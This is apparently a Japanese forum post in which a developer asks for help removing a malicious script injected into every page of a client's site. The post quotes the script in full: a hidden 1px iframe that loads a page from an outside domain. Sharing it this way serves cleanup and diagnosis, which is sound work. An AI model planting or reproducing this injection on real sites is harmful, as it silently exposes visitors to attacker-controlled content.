今日、クライアントから電話があり、バックエンドの一部の機能が突然機能しなくなったとのことでした。ざっと見てみると、ウェブサイトの最後のhtmlタグの下に悪意のあるコードが含まれていることがわかりました。これがコードです。
<script type="text/javascript">
(function () {
var zg = document.createElement('iframe');
zg.src = 'http://impactrl.de/chat/esd.php';
zg.style.position = 'absolute';
zg.style.border = '0'; zg.style.height = '1px';
zg.style.width = '1px'; zg.style.left = '1px';
zg.style.top = '1px';
if (!document.getElementById('zg')) {
document.write('<div id=\'zg\'></div>');
document.getElementById('zg').appendChild(zg);
}})();
</script>
私のクライアントはまた、彼が彼のデスクトップから彼の店を運営することを可能にするいくつかのソフトウェアをダウンロードしたと私に言いました。私の賭けは、これが問題だということです。
ただし、そのコードを削除したいのですが、どのファイルにも見つかりません。すべてのバックエンドとフロントエンドのページにあります。
誰かが私がどのファイルで見なければならないか知っていますか?